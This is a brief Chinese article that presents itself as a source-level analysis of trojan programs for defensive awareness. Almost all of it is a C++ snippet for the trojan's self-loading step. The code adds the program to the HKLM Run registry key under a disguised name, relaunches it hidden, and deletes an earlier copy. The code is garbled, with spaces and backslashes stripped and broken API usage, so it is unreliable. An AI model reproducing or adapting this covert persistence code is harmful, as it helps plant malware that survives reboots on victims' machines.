内容摘要:黑客到底是如何制造了这种种具有破坏力的木马程序呢,下面我对木马进行源代码级的详细的分析,让我们对木马的开发技术做一次彻底的透视,从了解木马技术开始,更加安全的管理好自己的计算机。
自装载部分:
HKEYhkey;
AnsiStringNewProgramName=AnsiString(sys)+AnsiString("")+PName;
unsignedlongk;
k=REG_OPENED_EXISTING_KEY;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN",
0L,
NULL,
REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_VALUE,
NULL,
&hkey,&k);
RegSetValueEx(hkey,
"BackGroup",
0,
REG_SZ,
NewProgramName.c_str(),
NewProgramName.Length());
RegCloseKey(hkey);
if(int(ShellExecute(Handle,
"open",
NewProgramName.c_str(),
NULL,
NULL,
SW_HIDE))>32)
{
WantClose=true;
Close();
}
else
{
HKEYhkey;
unsignedlongk;
k=REG_OPENED_EXISTING_KEY;
longa=RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,NULL,
&hkey,&k);
RegSetValueEx(hkey,
"BackGroup",
0,
REG_SZ,
ProgramName.c_str(),
ProgramName.Length());
intnum=0;
charstr[20];
DWORDlth=20;
DWORDtype;
charstrv[255];
DWORD vl=254;
DWORDSuc;
do{
Suc=RegEnumValue(HKEY_LOCAL_MACHINE,
(DWORD)num,str,
NULL,
&type,
strv,&vl);
if(strcmp(str,"BGroup")==0)
{
DeleteFile(AnsiString(strv));
RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup");
break;
}
}while(Suc==ERROR_SUCCESS);
RegCloseKey(hkey);
}
来源:大皮球 责编:豆豆技术应用